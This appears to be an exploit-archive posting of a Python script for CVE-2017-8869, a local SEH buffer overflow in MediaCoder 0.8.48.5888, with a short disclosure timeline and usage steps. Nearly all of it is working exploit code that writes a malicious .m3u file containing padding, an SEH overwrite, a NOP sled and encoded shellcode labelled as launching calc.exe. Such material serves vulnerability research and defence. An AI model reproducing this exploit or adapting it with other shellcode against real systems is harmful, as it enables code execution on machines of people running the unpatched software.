MediaCoder 0.8.48.5888 Local Buffer Overflow
Posted on 01 August 2017
#!/usr/bin/python # Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) # CVE : CVE-2017-8869 # Exploit Author : Muhann4d @0xSecured # Vendor Homepage : http://www.mediacoderhq.com # Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe # Vulnerable Version : 0.8.48.5888 # Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe # Category : Local Buffer Overflow # Tested on OS : Windows 7 Pro SP1 32bit # How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button. # or just write click on the .mu3 file .. open with .. MediaCoder # Timeline : # 2017-05-05: Vulnerability discovered, vendor has been contaced # 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" # 2017-05-09: A POC sent to the vendor. # 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/ # 2017-06-26: Exploit released. print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured" from struct import pack junk = "http://" + "x41" * 361 nseh = pack('<I',0x909006eb) seh = pack('<I',0x66017187) nops= "x90" * 20 #calc.exe shell=("xbexb6x06x32x7axdaxd1xd9x74x24xf4x5ax29xc9xb1" "x31x31x72x13x03x72x13x83xeax4axe4xc7x86x5ax6b" "x27x77x9ax0cxa1x92xabx0cxd5xd7x9bxbcx9dxbax17" "x36xf3x2exacx3axdcx41x05xf0x3ax6fx96xa9x7fxee" "x14xb0x53xd0x25x7bxa6x11x62x66x4bx43x3bxecxfe" "x74x48xb8xc2xffx02x2cx43xe3xd2x4fx62xb2x69x16" "xa4x34xbex22xedx2exa3x0fxa7xc5x17xfbx36x0cx66" "x04x94x71x47xf7xe4xb6x6fxe8x92xcex8cx95xa4x14" "xefx41x20x8fx57x01x92x6bx66xc6x45xffx64xa3x02" "xa7x68x32xc6xd3x94xbfxe9x33x1dxfbxcdx97x46x5f" "x6fx81x22x0ex90xd1x8dxefx34x99x23xfbx44xc0x29" "xfaxdbx7ex1fxfcxe3x80x0fx95xd2x0bxc0xe2xeaxd9" "xa5x13x1axd0x33x83x85x81x7exc9x35x7cxbcxf4xb5" "x75x3cx03xa5xffx39x4fx61x13x33xc0x04x13xe0xe1" "x0cx70x67x72xccx59x02xf2x77xa6") junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell))) exploit = junk + nseh + seh + nops + shell + junkD try: file= open("Exploit.m3u",'w') file.write(exploit) file.close() raw_input(" Exploit has been created! ") except: print "There has been an Error"
